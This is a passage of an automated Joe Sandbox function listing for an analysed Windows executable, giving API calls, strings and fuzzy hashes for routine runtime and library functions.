Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: d172309c1afbb9a51d3594969c094f597038d211808b256ba50c3ac4de13ba7a
Instruction ID: 1c7d65edd02cac363710c0d07acca5fdf2adbb95448cfac0c99f8cdaf245d910
Opcode Fuzzy Hash: d172309c1afbb9a51d3594969c094f597038d211808b256ba50c3ac4de13ba7a
Instruction Fuzzy Hash: CAF0CD35749A229B8F316FA46CC697727C8AF023A17190539E802D3944E7A8CE819FD1

Function 00197D00 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00192DD9,00192DD9,?,?,?,00197F51,00000001,00000001,54E85006), ref: 00197D5A
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00197F51,00000001,00000001,54E85006,?,?,?), ref: 00197DE0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,54E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00197EDA
__freea.LIBCMT ref: 00197EE7

Part of subcall function 00196B6E: RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0

__freea.LIBCMT ref: 00197EF0
__freea.LIBCMT ref: 00197F15

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 30ecd57630c915bbc1b7bec1f863808fb3f3d5fd011e54b0a7ef586ab0d1bbe8
Instruction ID: 9ee7964735a86e1fe926c02ea2dab9a2d7e873bd9b6094eb5ceb4364fe789381
Opcode Fuzzy Hash: 30ecd57630c915bbc1b7bec1f863808fb3f3d5fd011e54b0a7ef586ab0d1bbe8
Instruction Fuzzy Hash: 7451D172A2821AABDF299F64CC41EBF77A9EF54750F154A68FC14D61C0EB34EC40C6A0

Function 001863C4 Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,B19080A7,?,?,?,?,001A09B1,000000FF), ref: 00186413
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,001A09B1,000000FF), ref: 00186422
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,001A09B1,000000FF), ref: 00186430
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,001A09B1,000000FF), ref: 0018643E
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,001A09B1,000000FF), ref: 00186459
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,001A09B1,000000FF), ref: 00186483

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific
String ID:
API String ID: 909090443-0
Opcode ID: dfc029a4875d8745494feaf52676cafb24df4c9c11d5510797bf928af33ee990
Instruction ID: 8bb00f6af6a7fcf1f2206dd217b8d12759f36e77713d9861c80611e77a54f572
Opcode Fuzzy Hash: dfc029a4875d8745494feaf52676cafb24df4c9c11d5510797bf928af33ee990
Instruction Fuzzy Hash: 0031D8B2500289ABDB21DFA4DD45EEF77BCFB59710F40412AF90AD7150EB74AA48CB60

Function 0018FF6A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0018FF61,0018FEEC,0018D444), ref: 0018FF78
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0018FF86
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0018FF9F
SetLastError.KERNEL32(00000000,0018FF61,0018FEEC,0018D444), ref: 0018FFF1

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a38571ace9eff1b650e2a681478f6977ad3bb4568e8e3d01ad8a07cc07ff9ad1
Instruction ID: e2ae98f4c513315e91e668ded952100ce9b017719113cf8431dd2081ead170e8
Opcode Fuzzy Hash: a38571ace9eff1b650e2a681478f6977ad3bb4568e8e3d01ad8a07cc07ff9ad1
Instruction Fuzzy Hash: CB01D43321D2127EEA1537F46C8596A3A84EF23774330023DF324855F0EF514D829B84

Function 00196765 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00191C52,?,?,?,001916CD,00000050,?), ref: 00196769
_free.LIBCMT ref: 0019679C
_free.LIBCMT ref: 001967C4
SetLastError.KERNEL32(00000000,?), ref: 001967D1
SetLastError.KERNEL32(00000000,?), ref: 001967DD
_abort.LIBCMT ref: 001967E3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 32a05b95ebf752dc341ac62fc1d19ed0aa7e57b99aed7a78cbddac97881af0a4
Instruction ID: eac53df828cf49e7078caa91ee27c2b0bfe0e4fc78046a1e1a1151bd0cf0f1ee
Opcode Fuzzy Hash: 32a05b95ebf752dc341ac62fc1d19ed0aa7e57b99aed7a78cbddac97881af0a4
Instruction Fuzzy Hash: 55F0C8362446106BDE1933B8AD86F1F35599FE2779F250114F919D2991FF258C428171

Function 0018AF00 Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018AF0C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AF26
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AF37
TranslateMessage.USER32(?), ref: 0018AF41
DispatchMessageW.USER32(?), ref: 0018AF4B
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0018AF56

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 995bebf139e9a8ca9142faae97d6103ae0ec58c72a12c0dd69d93fc1e636fae5
Instruction ID: 4c7a8afad10292e50b8f8329d0172ebbc31d580d25d99bad232586fb956043d5
Opcode Fuzzy Hash: 995bebf139e9a8ca9142faae97d6103ae0ec58c72a12c0dd69d93fc1e636fae5
Instruction Fuzzy Hash: 09F03772A05219ABCF206BA5DC4CDDF7F6DEF523A1B040022F60AD2850D638D985CBE1

Function 001893F3 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 216windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000066), ref: 00189609
SendMessageW.USER32(00000000,00000143,00000000,001CAAD0), ref: 00189636
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00189662
__EH_prolog3_GS.LIBCMT ref: 0018A452

Strings

ProgramFilesDir, xrefs: 00189540
Software\Microsoft\Windows\CurrentVersion, xrefs: 00189554

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: MessageSend$H_prolog3_Item
String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 4098331016-2634093826
Opcode ID: 1b04eba76c2e9be5bd3a2a531a8f5f09c6a1707c163ebfe2c5bc8b6347233239
Instruction ID: f9bc4bc8e5d384927adcb01b594dbd0c13bb5191884ffd5fdc4dc63b9745ac9f
Opcode Fuzzy Hash: 1b04eba76c2e9be5bd3a2a531a8f5f09c6a1707c163ebfe2c5bc8b6347233239
Instruction Fuzzy Hash: 8C816131900258EBDF15EBA4CD91FEEB778AF29310F58405AE50AB7181EB705B89CF61

Function 00184D65 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00184D6C
_wcslen.LIBCMT ref: 00184E31
_wcslen.LIBCMT ref: 00184E7C

Strings

<br>, xrefs: 00184E2C, 00184E38
 , xrefs: 00184E77, 00184E83

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _wcslen$H_prolog3
String ID:  $<br>
API String ID: 1035939448-26742755
Opcode ID: c648ecc24b3d7e5234a3a110d4312e02bd69588da18ef3fa689a5f0460778a4a
Instruction ID: 21a980068dbda6470d8ff16c973ee34f5a63f6d92985f9a930995786b4758072
Opcode Fuzzy Hash: c648ecc24b3d7e5234a3a110d4312e02bd69588da18ef3fa689a5f0460778a4a
Instruction Fuzzy Hash: 0A414134B003129BDB28AF54C991A3D7332FBA5704F60842EE4159F681EFB59A92CFD1

Function 00187745 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00187755
GetObjectW.GDI32(00000000,00000018,?), ref: 0018777A
DeleteObject.GDI32(00000000), ref: 001877AC
DeleteObject.GDI32(00000000), ref: 001877CF

Part of subcall function 00185C5C: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001877A5,00000066), ref: 00185C6F
Part of subcall function 00185C5C: SizeofResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C86
Part of subcall function 00185C5C: LoadResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C9D
Part of subcall function 00185C5C: LockResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185CAC
Part of subcall function 00185C5C: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CC7
Part of subcall function 00185C5C: GlobalLock.KERNEL32(00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CD8
Part of subcall function 00185C5C: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00185D41
Part of subcall function 00185C5C: GlobalUnlock.KERNEL32(00000000), ref: 00185D60
Part of subcall function 00185C5C: GlobalFree.KERNEL32(00000000), ref: 00185D67

Strings

], xrefs: 00187782

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: b86a77f11955cce90f8765528fe7d7e701c1c7c89e8c65fbbf22ef7481eab861
Instruction ID: c4d779305da31df41d541c14af579783d85d6be692886d9fff2134394ed5ad2a
Opcode Fuzzy Hash: b86a77f11955cce90f8765528fe7d7e701c1c7c89e8c65fbbf22ef7481eab861
Instruction Fuzzy Hash: 8701D236540A01A7D7127BA48C09E7F7A7BEFA0B56F250014F904A72D0DB71CE158FE1

Function 00195447 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001953F8,001963DC,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002), ref: 00195467
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0019547A
FreeLibrary.KERNEL32(00000000,?,?,?,001953F8,001963DC,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002,00000000), ref: 0019549D

Strings

mscoree.dll, xrefs: 00195460
CorExitProcess, xrefs: 00195472

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 20526ec005ec2dbce5d44661757a6875aa6f446c9f5403645db772928654b3e2
Instruction ID: 4dd50a4bdd46d73e189b350df630e0fcf70f5afa3a18973dfadf7094a64b1b3b
Opcode Fuzzy Hash: 20526ec005ec2dbce5d44661757a6875aa6f446c9f5403645db772928654b3e2
Instruction Fuzzy Hash: BDF04F31A0160CBBDF129B95DC09BAEBFB5EF45752F004065F805A6561EB704AC0CB90

Function 00178C09 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0017A473: __EH_prolog3_GS.LIBCMT ref: 0017A47A
Part of subcall function 0017A473: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0017A4AF

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00178C28
GetProcAddress.KERNEL32(001BA138,CryptUnprotectMemory), ref: 00178C38

Strings

Crypt32.dll, xrefs: 00178C12
CryptUnprotectMemory, xrefs: 00178C2E
CryptProtectMemory, xrefs: 00178C22

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AddressProc$DirectoryH_prolog3_System
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 270589589-1753850145
Opcode ID: 82925ff9010a6578b99e62b9e746e3575e0ff29c061a4d1c99947c754f095639
Instruction ID: 1f79dad34752c068b0a96abc1ca19472a554291d1a87d8d1bdf57601278ea78a
Opcode Fuzzy Hash: 82925ff9010a6578b99e62b9e746e3575e0ff29c061a4d1c99947c754f095639
Instruction Fuzzy Hash: 4DE01A748457525ECB265B6C9908A827EE45B16710B14C81DF4CAD2551DBB5D4C08B60

Function 0019004D Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00190114
___AdjustPointer.LIBCMT ref: 00190137
_abort.LIBCMT ref: 00190185
___AdjustPointer.LIBCMT ref: 001901D3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 569c7c911c86bdaaa11e1012ff5d30cae11d59d15b3015031e8af6757617a9c7
Instruction ID: 06fe991374c15e5663883646986295247291deebf10cca0dcf6d4bbb59434dca
Opcode Fuzzy Hash: 569c7c911c86bdaaa11e1012ff5d30cae11d59d15b3015031e8af6757617a9c7
Instruction Fuzzy Hash: DA51AE72600306AFEF2A9F54D841BBA77A5EF58710F18452DEC05872A2E731EE80CB91

Function 00174862 Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00174869
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?), ref: 001748F4
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0017494B
SetFileTime.KERNEL32(?,00000000,00000000,00000000), ref: 00174A0D
CloseHandle.KERNEL32(?), ref: 00174A14

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: File$Create$CloseH_prolog3_HandleTime
String ID:
API String ID: 4002707884-0
Opcode ID: e8074da6bb77c62b2846ed317a8f983f0db16fee6cedcabc19d536076f0099f0
Instruction ID: ed110a4b2aa4816f2e87fc8c6cf0243609c7befafed357ec61efe6cbca38b9ea
Opcode Fuzzy Hash: e8074da6bb77c62b2846ed317a8f983f0db16fee6cedcabc19d536076f0099f0
Instruction Fuzzy Hash: DB519B30E00249ABEF25DFE8C845BEEBBB5AF49314F248119F555F7280D7349A44CB69

Function 001992D0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001992D9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001992FC

Part of subcall function 00196B6E: RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00199322
_free.LIBCMT ref: 00199335
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00199344

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: fc8dc00c49c6369057b7bc1a9a1ce465e84fbeeb74ce1c9e507461be6c8bb4d1
Instruction ID: 142c08b39c086fc9b7ec85bd2f3e9a64a19f2b614d95eb9a83990e35b3bbb410
Opcode Fuzzy Hash: fc8dc00c49c6369057b7bc1a9a1ce465e84fbeeb74ce1c9e507461be6c8bb4d1
Instruction Fuzzy Hash: EF0184726422157F6B212A7E5C8DC7F6A6DEEC6BA1755012DF905C2280EB608D4281B0

Function 001967E9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0018C17E,0018C17E,?,00196938,00196BB1,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?), ref: 001967EE
_free.LIBCMT ref: 00196823
_free.LIBCMT ref: 0019684A
SetLastError.KERNEL32(00000000,?,0018C17E), ref: 00196857
SetLastError.KERNEL32(00000000,?,0018C17E), ref: 00196860

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 5c1e3d8a7cf10694e70332cdaf1be07f203cd0e6e825108f72d5ccbdac52fddc
Instruction ID: e4ae73d78e8f1f92eade8f89ab0b2e9a44da27a4c9724932e792712b695e4052
Opcode Fuzzy Hash: 5c1e3d8a7cf10694e70332cdaf1be07f203cd0e6e825108f72d5ccbdac52fddc
Instruction Fuzzy Hash: F401C8322457002BDE1667785D95D2B265DDBE33B57210039F916E39A2FF74CC45C570

Function 00199B9F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00199BB7

Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C

_free.LIBCMT ref: 00199BC9
_free.LIBCMT ref: 00199BDB
_free.LIBCMT ref: 00199BED
_free.LIBCMT ref: 00199BFF

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ae9fc77e37b6d12c6e05e3aab1da32f70224fcc8354cfe8000ac9b5442e09576
Instruction ID: c2f171ba6307935d20b5651aab6efa4cb3eaff9440123deec94a96fb5de1a54c
Opcode Fuzzy Hash: ae9fc77e37b6d12c6e05e3aab1da32f70224fcc8354cfe8000ac9b5442e09576
Instruction Fuzzy Hash: AFF03A32706200ABCE20EB6CF9C6C1A77E9BB017107690809F80AD7940EB74FCC0CA74

Function 00195EE0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00195EFE

